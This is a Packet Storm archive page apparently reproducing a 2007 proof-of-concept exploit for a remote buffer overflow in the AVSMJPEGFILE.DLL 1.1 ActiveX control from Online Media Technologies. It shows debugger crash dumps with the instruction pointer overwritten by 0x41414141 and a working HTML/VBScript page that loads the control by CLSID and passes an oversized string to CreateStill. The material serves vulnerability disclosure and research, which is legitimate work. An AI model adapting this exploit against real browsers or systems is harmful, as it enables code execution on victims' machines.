exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

omt-bofpoc.txt

omt-bofpoc.txt
Posted Dec 12, 2007
Authored by shinnai | Site shinnai.altervista.org

Online Media Technologies remote buffer overflow proof of concept exploit that makes use of AVSMJPEGFILE.DLL version 1.1.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 5cfbac8e931aab99da7b1eb11acc7fad023c22bedd2abc2435e4d9c4c8f55299

omt-bofpoc.txt

Change Mirror Download
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-------------------------------------------------------------------------------
<b>Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote Buffer Overflow</b>
url: www.avsmedia.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

<b>Technical details:
File: AVSMJPEGFILE.DLL
Ver.: 1.1.1.102</b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Remote execution depends on Internet Explorer settings</b>

faultmon dump:
09:58:13.236 pid=13E4 tid=145C EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [41414141])
----------------------------------------------------------------
EAX=02A31C64: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
EBX=00001C4A: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00001448: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESP=0188C9A4: A0 3F 9B 02 41 41 41 41-41 41 41 41 41 41 41 41
EBP=0188EE08: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
ESI=00000A25: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=029B3FA0: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
EIP=02BF3604: 89 01 E8 0F D6 03 00 83-C4 04 33 C0 8D A5 EC F7
--> MOV [ECX],EAX
----------------------------------------------------------------

09:58:13.252 pid=13E4 tid=145C EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
ESP=0188C5D4: BF 37 91 7C BC C6 88 01-80 F2 88 01 D8 C6 88 01
EBP=0188C5F4: A4 C6 88 01 8B 37 91 7C-BC C6 88 01 80 F2 88 01
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
--> N/A
----------------------------------------------------------------
-------------------------------------------------------------------------------
<object classid='clsid:4CF945DB-7D52-437B-AD30-185336B44C74' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
buff = String(3620, "A")
test.CreateStill buff, 1, True
End Sub
</script>
</span></span>
</code></pre>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close